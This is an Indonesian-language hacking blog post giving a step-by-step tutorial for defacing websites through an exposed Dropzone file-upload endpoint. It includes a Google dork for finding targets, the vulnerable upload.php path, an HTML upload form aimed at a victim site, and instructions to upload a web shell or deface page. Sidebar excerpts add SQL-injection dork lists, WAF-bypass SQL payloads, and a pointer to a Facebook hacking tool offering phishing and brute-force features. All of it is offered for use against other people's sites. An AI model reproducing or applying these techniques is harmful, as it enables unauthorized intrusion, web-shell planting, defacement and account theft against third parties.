Skip to main content

Deface Metode CSRF Dropzone File Upload

Hallo semuanya  balik lagi dengan saya EssesCyber7...
Kali ini saya akan memberikan tutorial deface metode 

Deface Metode CSRF Dropzone File Upload

Lansung saja kita siapkan bahan bahan nya
1.      PC / laptop / HandPhone
2.      Internet Akses
3.      CSRF (saya make CSRF Online)
Kalo sudah siap semua bahannya langsung saja dimulai tutorial nya
Buka browser kalian kemudian buka goole,com. Jika sudah masukan Dork / kata kunci
Disini dork yang saya pakai adalahinurl:/dropzone/uploads/
Lihat pada gambar
Jika menurut kalian pada pencarian ALL hasilnya kurang memuaskan kalian silahkan cari pada bagian Images, siapa tau dapet hasil banyak
Nah lanjut ke tutorial nya
Setelah dapat web yang mnurut kalian vuln langsung aja masukin exploitnya
Exploit: /dropzone/upload.php
Contoh: sayangmantan,tk/[path]/dropzone/upload.php
Lihat pada gambar
Setelah dimasukkan exploitnya nanti bakal ketahuan Vuln atau tidak, untuk exploit Metode Dropzone File Upload ini jika Vuln maka aka Blank ( tidak tampil apa apa)
Lihat gambar
Nah kalo tampilan diatas berarti vuln, kalo sudah ketahuan vuln nya langsung saja kita masukan ke CSRF ditutorial saya, saya selalu menggunakan csrf online karena kebih mudah.

<form method="POST" action="http://sayangmantan,tt/[path]/dropzone/upload.php "
enctype="multipart/form-data">
<input type="file" name="file" /><button>Upload</button>
</form>
Simpan script diatas dengan format html, contoh dropzone.html
Disini saya langsung menggunakan CSRF Online, jadi langsung menyesuaikan saja
Masukkan URL target dibagian URL dan isikan POST File dengan file
Jika sudah langsung klik Lock!
Setelah dilock pilih file yang akan diupload disini kita bisa langsung upload file berekstensi .php ,html . txt .jpg .jpeg .png. kalian juga bisa upload shell / script deface kalian disini
Tunggu sampai proses upload selesai
Jika sudah selesai kalian bisa langsung akses file yang sudah diupload tadi. Letak file biasanya ada pada dir:/dropzone/uploads/namafile.php
Contoh:http://sayangmantan,tk/[path]/dropzone/uploads/namafile.php
Terkadang file sudah diupload nama file tersebut akan berubah secara otomatis
Lihat gambar
Gambar diatas menunjukan bahwa saya sudah sukses melakukan upload file, dengan nama yang sudah dirubah secara otomatis
Kemudian akses file nya kita gunakan nama file yang sudah dirubah tadi
Lihat gambar
Selamat mencoba, jika menurut kalian tutorial ini berguna silahkan dishare
Terima Kasih

Comments

Post a Comment

Popular posts from this blog

Dork SQL Injection 2019

Hallo kali ini saya akan memberikan Dork untuk SQL Injection Yaps langsung saja di comot :p Dork ini bersumber dari :  https://www.nextleveltricks.com/latest-google-dorks-list/   Ok langsung saja  about.php?cartID= accinfo.php?cartId= acclogin.php?cartID= add.php?bookid= add_cart.php?num= addcart.php? addItem.php add-to-cart.php?ID= addToCart.php?idProduct= addtomylist.php?ProdId= adminEditProductFields.php?intProdID= advSearch_h.php?idCategory= affiliate.php?ID= affiliate-agreement.cfm?storeid= affiliates.php?id= ancillary.php?ID= archive.php?id= article.php?id= phpx?PageID basket.php?id= Book.php?bookID= book_list.php?bookid= book_view.php?bookid= BookDetails.php?ID= browse.php?catid= browse_item_details.php Browse_Item_Details.php?Store_Id= buy.php? buy.php?bookid= bycategory.php?id= cardinfo.php?card= cart.php?action= cart.php?cart_id= cart.php?id= cart_additem.php?id= cart_validate.php?id= cartadd.php?id= cat.php?iCat= catalog.php catalog.php?CatalogID= catalog_item.ph
Post a Comment
Read more

Macam-Macam Bypass WAF - SQL Injection

Pada postingan kali ini w mau sharing artikel tentang Maca-macam Bypass WAF pada suatu Sql Injection. Dalam dunia injector kita tidak asing lagi dengan istilah WAF. Apaan sih  WAF  itu? WAF adalah kepanjangan dari (Web Application Firewall) dimana waf itu dipasang sebagai firewall security web untuk keamanan umum. Jadi rata-rata web yang udah di pasang waf itu kebal sama  SQL Injection  yang basic atau sql injection dengan statement error (  '  ) atau (  /**  ) Untuk itu gw akan sedikit berbagi tentang jenis-jenis waf yang biasa di gunakan dalam dunia injector. Dan berikut ini macam-macam bypass waf, order by /**/ORDER/**/BY/**/ /*!order*/+/*!by*/ /*!ORDER BY*/ /*!50000ORDER BY*/ /*!50000ORDER*//**//*!50000BY*/ /*!12345ORDER*/+/*!BY*/ union select /*!50000%55nIoN*/ /*!50000%53eLeCt*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLe
Post a Comment
Read more

FBHT v2.0 - Facebook Hacking Tool

FBHT (Facebook Hacking Tool) adalah tool open-source yang ditulis dengan program Python yang mengeksploitasi banyak kerentanan pada platform Facebook Install FBHT Tool Pertama sebelum menjalankan tool ini kalian harus melakukan cloning pada sebuah repository github berikut git clone https://github.com/chinoogawa/fbht Running FBHT Tool Menjalankan tool ini cukup mudah cukup ikuti perintah seperti ini python main.py Di sana banyak pilihan mulai dari Phising, Bruteforce dll, kalian bisa pilih dan menggunakan sesuka hati kalian :D
Post a Comment
Read more